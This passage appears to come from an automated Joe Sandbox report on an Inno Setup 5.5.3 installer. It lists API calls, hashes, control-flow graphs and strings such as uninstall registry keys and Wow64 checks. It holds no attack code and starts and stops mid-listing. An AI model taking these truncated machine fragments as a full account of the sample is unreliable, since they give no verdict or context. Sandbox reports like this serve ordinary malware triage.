                                                                                                      • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                                      • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                                      • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                                      • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                      • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
                                                                                                      • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                                      • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                                      • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                                                      • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                                                      • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                                                      • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                                                                    • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0212FBC8,02131928,?,?,02131958,?,?,021319A8,?), ref: 004683FD
                                                                                                    • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                                                                    • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                                                      • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                                                    • String ID: $(Default)$STOPIMAGE$%H
                                                                                                    • API String ID: 3231140908-2624782221
                                                                                                    • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                    • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                                                                    • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                    • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                                                                    • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                    • String ID: unins$unins???.*
                                                                                                    • API String ID: 3541575487-1009660736
                                                                                                    • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                    • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
                                                                                                    • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                    • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileFindFirstLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 873889042-0
                                                                                                    • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                    • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                                                    • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                    • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(?,0046E17A), ref: 0046E0EE
                                                                                                    • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,?,0046E17A), ref: 0046E10A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateInstanceVersion
                                                                                                    • String ID:
                                                                                                    • API String ID: 1462612201-0
                                                                                                    • Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                                    • Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
                                                                                                    • Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                                    • Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
                                                                                                    APIs
                                                                                                    • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                                    • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                                                                    • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                                    • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                                                                    APIs
                                                                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NtdllProc_Window
                                                                                                    • String ID:
                                                                                                    • API String ID: 4255912815-0
                                                                                                    • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                                    • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                                                    • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                                    • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NameUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2645101109-0
                                                                                                    • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                                    • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                                                                    • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                                    • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                                                                    APIs
                                                                                                    • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NtdllProc_Window
                                                                                                    • String ID:
                                                                                                    • API String ID: 4255912815-0
                                                                                                    • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                                    • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                                                                    • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                                    • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 844 46f058-46f08a 845 46f0a7 844->845 846 46f08c-46f093 844->846 849 46f0ae-46f0e6 call 403634 call 403738 call 42dec0 845->849 847 46f095-46f09c 846->847 848 46f09e-46f0a5 846->848 847->845 847->848 848->849 856 46f101-46f12a call 403738 call 42dde4 849->856 857 46f0e8-46f0fc call 403738 call 42dec0 849->857 865 46f12c-46f135 call 46ed28 856->865 866 46f13a-46f163 call 46ee44 856->866 857->856 865->866 870 46f175-46f178 call 403400 866->870 871 46f165-46f173 call 403494 866->871 875 46f17d-46f1c8 call 46ee44 call 42c3fc call 46ee8c call 46ee44 870->875 871->875 884 46f1de-46f1ff call 45559c call 46ee44 875->884 885 46f1ca-46f1dd call 46eeb4 875->885 892 46f255-46f25c 884->892 893 46f201-46f254 call 46ee44 call 431404 call 46ee44 call 431404 call 46ee44 884->893 885->884 894 46f25e-46f29b call 431404 call 46ee44 call 431404 call 46ee44 892->894 895 46f29c-46f2a3 892->895 893->892 894->895 899 46f2e4-46f309 call 40b24c call 46ee44 895->899 900 46f2a5-46f2e3 call 46ee44 * 3 895->900 919 46f30b-46f316 call 47c26c 899->919 920 46f318-46f321 call 403494 899->920 900->899 929 46f326-46f331 call 478e04 919->929 920->929 934 46f333-46f338 929->934 935 46f33a 929->935 936 46f33f-46f509 call 403778 call 46ee44 call 47c26c call 46ee8c call 403494 call 40357c * 2 call 46ee44 call 403494 call 40357c * 2 call 46ee44 call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c 934->936 935->936 999 46f51f-46f52d call 46eeb4 936->999 1000 46f50b-46f51d call 46ee44 936->1000 1004 46f532 999->1004 1005 46f533-46f57c call 46eeb4 call 46eee8 call 46ee44 call 47c26c call 46ef4c 1000->1005 1004->1005 1016 46f5a2-46f5af 1005->1016 1017 46f57e-46f5a1 call 46eeb4 * 2 1005->1017 1019 46f5b5-46f5bc 1016->1019 1020 46f67e-46f685 1016->1020 1017->1016 1024 46f5be-46f5c5 1019->1024 1025 46f629-46f638 1019->1025 1021 46f687-46f6bd call 494cec 1020->1021 1022 46f6df-46f6f5 RegCloseKey 1020->1022 1021->1022 1024->1025 1029 46f5c7-46f5eb call 430bcc 1024->1029 1028 46f63b-46f648 1025->1028 1032 46f65f-46f678 call 430c08 call 46eeb4 1028->1032 1033 46f64a-46f657 1028->1033 1029->1028 1039 46f5ed-46f5ee 1029->1039 1042 46f67d 1032->1042 1033->1032 1035 46f659-46f65d 1033->1035 1035->1020 1035->1032 1041 46f5f0-46f616 call 40b24c call 479630 1039->1041 1047 46f623-46f625 1041->1047 1048 46f618-46f61e call 430bcc 1041->1048 1042->1020 1047->1041 1050 46f627 1047->1050 1048->1047 1050->1028
                                                                                                    APIs
                                                                                                      • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                                      • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                                    • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value$Close
                                                                                                    • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                                    • API String ID: 3391052094-3342197833
                                                                                                    • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                                    • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                                                                    • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                                    • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1051 492848-49287c call 403684 1054 49287e-49288d call 446f9c Sleep 1051->1054 1055 492892-49289f call 403684 1051->1055 1060 492d22-492d3c call 403420 1054->1060 1061 4928ce-4928db call 403684 1055->1061 1062 4928a1-4928c4 call 446ff8 call 403738 FindWindowA call 447278 1055->1062 1070 49290a-492917 call 403684 1061->1070 1071 4928dd-492905 call 446ff8 call 403738 FindWindowA call 447278 1061->1071 1080 4928c9 1062->1080 1078 492919-49295b call 446f9c * 4 SendMessageA call 447278 1070->1078 1079 492960-49296d call 403684 1070->1079 1071->1060 1078->1060 1090 4929bc-4929c9 call 403684 1079->1090 1091 49296f-4929b7 call 446f9c * 4 PostMessageA call 4470d0 1079->1091 1080->1060 1100 492a18-492a25 call 403684 1090->1100 1101 4929cb-492a13 call 446f9c * 4 SendNotifyMessageA call 4470d0 1090->1101 1091->1060 1113 492a52-492a5f call 403684 1100->1113 1114 492a27-492a4d call 446ff8 call 403738 RegisterClipboardFormatA call 447278 1100->1114 1101->1060 1125 492a61-492a9b call 446f9c * 3 SendMessageA call 447278 1113->1125 1126 492aa0-492aad call 403684 1113->1126 1114->1060 1125->1060 1138 492aaf-492aef call 446f9c * 3 PostMessageA call 4470d0 1126->1138 1139 492af4-492b01 call 403684 1126->1139 1138->1060 1152 492b48-492b55 call 403684 1139->1152 1153 492b03-492b43 call 446f9c * 3 SendNotifyMessageA call 4470d0 1139->1153 1164 492baa-492bb7 call 403684 1152->1164 1165 492b57-492b75 call 446ff8 call 42e394 1152->1165 1153->1060 1175 492bb9-492be5 call 446ff8 call 403738 call 446f9c GetProcAddress 1164->1175 1176 492c31-492c3e call 403684 1164->1176 1185 492b87-492b95 GetLastError call 447278 1165->1185 1186 492b77-492b85 call 447278 1165->1186 1206 492c21-492c2c call 4470d0 1175->1206 1207 492be7-492c1c call 446f9c * 2 call 447278 call 4470d0 1175->1207 1187 492c40-492c61 call 446f9c FreeLibrary call 4470d0 1176->1187 1188 492c66-492c73 call 403684 1176->1188 1194 492b9a-492ba5 call 447278 1185->1194 1186->1194 1187->1060 1203 492c98-492ca5 call 403684 1188->1203 1204 492c75-492c93 call 446ff8 call 403738 CreateMutexA 1188->1204 1194->1060 1215 492cdb-492ce8 call 403684 1203->1215 1216 492ca7-492cd9 call 48ccc8 call 403574 call 403738 OemToCharBuffA call 48cce0 1203->1216 1204->1060 1206->1060 1207->1060 1228 492cea-492d1c call 48ccc8 call 403574 call 403738 CharToOemBuffA call 48cce0 1215->1228 1229 492d1e 1215->1229 1216->1060 1228->1060 1229->1060
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
                                                                                                    • FindWindowA.USER32(00000000,00000000), ref: 004928B9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FindSleepWindow
                                                                                                    • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                                    • API String ID: 3078808852-3310373309
                                                                                                    • Opcode ID: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                                    • Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
                                                                                                    • Opcode Fuzzy Hash: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                                    • Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1621 483a7c-483aa1 GetModuleHandleA GetProcAddress 1622 483b08-483b0d GetSystemInfo 1621->1622 1623 483aa3-483ab9 GetNativeSystemInfo GetProcAddress 1621->1623 1624 483b12-483b1b 1622->1624 1623->1624 1625 483abb-483ac6 GetCurrentProcess 1623->1625 1626 483b2b-483b32 1624->1626 1627 483b1d-483b21 1624->1627 1625->1624 1632 483ac8-483acc 1625->1632 1630 483b4d-483b52 1626->1630 1628 483b23-483b27 1627->1628 1629 483b34-483b3b 1627->1629 1633 483b29-483b46 1628->1633 1634 483b3d-483b44 1628->1634 1629->1630 1632->1624 1635 483ace-483ad5 call 45271c 1632->1635 1633->1630 1634->1630 1635->1624 1639 483ad7-483ae4 GetProcAddress 1635->1639 1639->1624 1640 483ae6-483afd GetModuleHandleA GetProcAddress 1639->1640 1640->1624 1641 483aff-483b06 1640->1641 1641->1624
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                    • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                    • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                    • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                    • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                                    • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                                    • API String ID: 2230631259-2623177817
                                                                                                    • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                                    • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
